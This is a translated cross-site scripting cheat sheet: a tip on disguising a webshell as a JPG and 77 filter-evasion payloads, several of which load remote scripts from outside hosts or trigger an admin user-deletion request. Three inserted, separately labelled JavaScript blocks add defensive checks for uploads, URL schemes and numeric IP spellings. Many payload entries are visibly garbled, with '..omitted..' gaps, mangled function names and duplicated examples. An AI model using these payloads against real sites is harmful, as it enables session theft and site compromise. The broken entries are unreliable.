Cross-site image shell
XSS cross-site code: <script>alert("")</script>
Add the code to the first line of the webshell, then change the webshell into a JPG image; when the image-format webshell is accessed, our webshell still executes.
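The server-side counterpart to the image-shell trick above, added here as an example that is not part of the original post: a Node.js check that accepts an upload only when its leading bytes match the image type its file name claims, plus the response headers to send when serving stored uploads so a browser cannot reinterpret the bytes as HTML. The function names (`validateImageUpload`, `uploadResponseHeaders`) and the sample buffers are constructed for this example.

```javascript
// Added example, not from the original post. Validates an "image" upload by its
// magic bytes rather than its file name, and builds the headers a server should
// use when it serves the stored file back.

// Leading byte signatures of the image types this upload endpoint accepts.
const IMAGE_SIGNATURES = {
  jpg: [[0xff, 0xd8, 0xff]],
  jpeg: [[0xff, 0xd8, 0xff]],
  png: [[0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]],
  gif: [[0x47, 0x49, 0x46, 0x38, 0x37, 0x61], [0x47, 0x49, 0x46, 0x38, 0x39, 0x61]], // GIF87a / GIF89a
};

const MIME_TYPES = { jpg: "image/jpeg", png: "image/png", gif: "image/gif" };

function hasSignature(bytes, sig) {
  return bytes.length >= sig.length && sig.every((b, i) => bytes[i] === b);
}

// Returns { ok: true, type } when the bytes really are the image the name claims,
// otherwise { ok: false, reason }. `bytes` is a Buffer or Uint8Array.
function validateImageUpload(bytes, filename) {
  const ext = filename.includes(".") ? filename.split(".").pop().toLowerCase() : "";
  const sigs = IMAGE_SIGNATURES[ext];
  if (!sigs) return { ok: false, reason: "extension not allowed" };
  if (!sigs.some((sig) => hasSignature(bytes, sig))) {
    return { ok: false, reason: "magic bytes do not match extension" };
  }
  // A script renamed to .jpg already fails the signature check above; this scan
  // of the first KiB also catches markup placed right behind a valid header.
  const head = String.fromCharCode(...bytes.subarray(0, 1024));
  if (/<script|<\?php|<html|<iframe/i.test(head)) {
    return { ok: false, reason: "active content near file start" };
  }
  return { ok: true, type: ext === "jpeg" ? "jpg" : ext };
}

// Headers for serving a stored upload: the real MIME type plus nosniff, so the
// browser never guesses a different type from the content.
function uploadResponseHeaders(type) {
  return { "Content-Type": MIME_TYPES[type], "X-Content-Type-Options": "nosniff" };
}

// Constructed samples: the start of a JFIF JPEG, and the post's script line saved as .jpg.
const SAMPLE_JPEG = new Uint8Array([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10, 0x4a, 0x46, 0x49, 0x46, 0x00, 0x01]);
const SAMPLE_FAKE_JPEG = new TextEncoder().encode('<script>alert("")</script>\n');

console.log(validateImageUpload(SAMPLE_JPEG, "photo.jpg"));      // { ok: true, type: 'jpg' }
console.log(validateImageUpload(SAMPLE_FAKE_JPEG, "photo.jpg")); // { ok: false, reason: 'magic bytes do not match extension' }
```

Serving uploads from a separate origin (so any markup that does slip through runs outside the application's origin) complements the check; the headers above are what the application origin itself should send.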
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolons are required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect in China, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
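The thread running through vectors 3 to 19, 31 to 46 and 77 is a filter that compares the raw attribute string against "javascript:" while the browser first decodes HTML entities and ignores tabs, newlines, nulls and other control characters inside the scheme. The check below, added as an example that is not part of the original post, does the same normalisation before deciding whether a URL may be emitted into an href, src or background attribute. The function names (`decodeHtmlEntities`, `stripSchemeNoise`, `extractScheme`, `isSafeUrl`) and the scheme allow list are constructed for this example.

```javascript
// Added example, not from the original post. A defensive check for URLs that
// end up in href/src/background attributes: decode, strip, lower-case, and
// only then compare the scheme against an allow list.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Decode numeric entities (&#106; &#x6A; with or without the semicolon) and the
// few named entities that matter here. Unknown entities are left untouched.
function decodeHtmlEntities(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'", tab: "\t", newline: "\n" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      const code = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    const key = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, key) ? named[key] : match;
  });
}

// Browsers ignore C0 controls, space and DEL inside the scheme (this is what
// makes "jav\tascript:" and "java\0script:" work), so strip them before parsing.
function stripSchemeNoise(s) {
  return s.replace(/[\u0000-\u0020\u007f]/g, "");
}

// Scheme per RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) followed by ":".
function extractScheme(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// True only for relative URLs or an allow-listed scheme; everything else
// (javascript:, vbscript:, data:, livescript:, unknown schemes) is rejected.
function isSafeUrl(rawAttributeValue) {
  const normalized = stripSchemeNoise(decodeHtmlEntities(rawAttributeValue));
  const scheme = extractScheme(normalized);
  if (scheme === null) return true; // no scheme: relative or protocol-relative URL
  return ALLOWED_SCHEMES.has(scheme);
}

console.log(isSafeUrl("jav&#x09;ascript:alert('XSS');")); // false
console.log(isSafeUrl("http://3w.org/XSS/xss.js"));      // true
```

The function only decides; what is written into the page is still the original value, attribute-encoded by the template engine. A protocol-relative or absolute URL to another host passes this check, so where the destination matters (vectors 68 to 76) a separate host check is needed on top.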
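Vectors 70 to 73 and 76 all write one address in different numeric spellings (decimal integer, hex octets, octal octets, a mix, a trailing dot), which browsers and WHATWG-compliant URL parsers fold to a single dotted quad. A host allow or deny list that compares raw strings is therefore easy to slip past. The canonicaliser below, added as an example that is not part of the original post, performs the same folding so a defensive host check sees the real address. The function names (`parseIpv4Part`, `canonicalizeIpv4`, `hostAllowed`) and the allow-list contents are constructed for this example.

```javascript
// Added example, not from the original post. Folds the numeric IPv4 spellings
// from vectors 70-73 to a canonical dotted quad before a host is compared
// against an allow list.

// One dotted component: "0x.." is hex, a leading 0 means octal, otherwise
// decimal. Anything else (letters, "08", an empty part) is not an IPv4 literal.
function parseIpv4Part(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]+$/.test(part)) return parseInt(part.slice(1), 8);
  if (/^(0|[1-9][0-9]*)$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Returns "a.b.c.d" for any numeric form of an IPv4 host, or null when the host
// is not an IPv4 literal (a DNS name, too many parts, an octet out of range).
function canonicalizeIpv4(host) {
  const parts = host.split(".");
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(Number.isNaN)) return null;
  // The last part fills all remaining bytes: "3232235521" is one 32-bit value,
  // "192.11010049" would be 192 followed by a 24-bit tail, and so on.
  const tailBytes = 5 - nums.length;
  const tail = nums[nums.length - 1];
  if (tail >= 256 ** tailBytes || nums.slice(0, -1).some((n) => n > 255)) return null;
  let value = tail;
  for (let i = 0; i < nums.length - 1; i++) value += nums[i] * 256 ** (3 - i);
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join(".");
}

// True when the URL's host, after canonicalisation, is on the allow list. The
// list holds dotted quads and lower-case DNS names without the trailing dot
// that vector 76 adds.
function hostAllowed(urlString, allowedHosts) {
  let parsed;
  try { parsed = new URL(urlString); } catch { return false; } // relative or unparsable
  const raw = parsed.hostname.replace(/\.$/, "");
  const host = canonicalizeIpv4(raw) || raw.toLowerCase();
  return allowedHosts.has(host);
}

console.log(canonicalizeIpv4("3232235521"));         // 192.168.0.1
console.log(canonicalizeIpv4("66.000146.0x7.147"));  // 66.102.7.147
```

Node's own `URL` class already applies this folding to `hostname`, so in practice the parse step does most of the work; the hand-rolled version shows what that folding is and is what a filter that only sees a raw string (a proxy ACL, a log rule) needs to apply itself.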